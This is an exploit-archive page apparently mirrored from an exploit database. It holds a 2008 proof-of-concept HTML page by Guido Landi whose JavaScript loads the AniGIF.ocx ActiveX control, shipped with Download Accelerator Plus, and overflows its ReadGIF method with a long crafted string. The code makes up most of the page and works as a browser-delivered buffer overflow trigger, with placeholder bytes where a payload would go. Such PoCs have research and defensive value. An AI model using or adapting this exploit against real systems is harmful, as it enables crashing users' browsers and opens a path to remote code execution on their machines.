Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC
# Published : 2008-08-10
# Author : Guido Landi
# Previous Title : FlashGet 1.9 (FTP PWD Response) Remote BOF Exploit PoC 0day
# Next Title : Sun xVM VirtualBox < 1.6.4 Privilege Escalation Vulnerability PoC

<html>
<body>
<object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' />
</object>
<script language=javascript>

// anigif.ocx by www.jcomsoft.com can be found distribuited with some applications, 
// I found it in Download Accelerator Plus 6.8. 
// DAP comes with an old version, but the last from jcomsoft is also vulnerable:
// there's a stack-based buffer overflow in the ReadGIF and ReadGIF2 methods, 
// the funny thing is that after the first exception that will be handled by IE,
// when the object is released we reach RtlpCoalesceFreeBlocks owning eax and ecx 
// with windogs xp sp1 or the second check of safe-unlink with sp2 in a standard heap 
// overflow scenario.

var buf;
for (var i=0; i<259; i++) buf += "X";

buf +="BBBB";
buf += "CCCC";

for (var i=0; i<5728; i++) buf += "H";

target.ReadGIF(buf);

window.location = "http://www.google.com";

</script>
</body>
</html>

# www.Syue.com [2008-08-10]